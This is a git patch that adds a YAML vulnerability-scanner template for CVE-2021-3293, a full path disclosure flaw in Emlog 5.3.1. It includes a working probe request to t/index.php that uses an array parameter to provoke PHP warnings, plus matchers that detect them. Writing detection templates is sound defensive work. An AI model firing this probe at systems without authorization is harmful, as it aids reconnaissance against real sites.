From c61a253f75e9c500743796b5f292f5d63a4da182 Mon Sep 17 00:00:00 2001 From: xiaoheihei1107 <62200676+xiaoheihei1107@users.noreply.github.com> Date: Wed, 23 Feb 2022 16:24:44 +0800 Subject: [PATCH] Create CVE-2021-3293.yaml (#3748) * Create CVE-2021-3293.yaml * misc updates Co-authored-by: sandeep --- cves/2021/CVE-2021-3293.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-3293.yaml diff --git a/cves/2021/CVE-2021-3293.yaml b/cves/2021/CVE-2021-3293.yaml new file mode 100644 index 0000000000..70ac82f483 --- /dev/null +++ b/cves/2021/CVE-2021-3293.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-3293 + +info: + name: Emlog 5.3.1 Path Disclosure + description: emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file. + author: h1ei1 + severity: high + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3293 + - https://github.com/emlog/emlog/issues/62 + - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md + tags: cve,cve2021,emlog,fpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3293 + cwe-id: CWE-22 + +requests: + - raw: + - | + GET /t/index.php?action[]=aaaa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Warning" + - "on line" + - "expects parameter" + condition: and \ No newline at end of file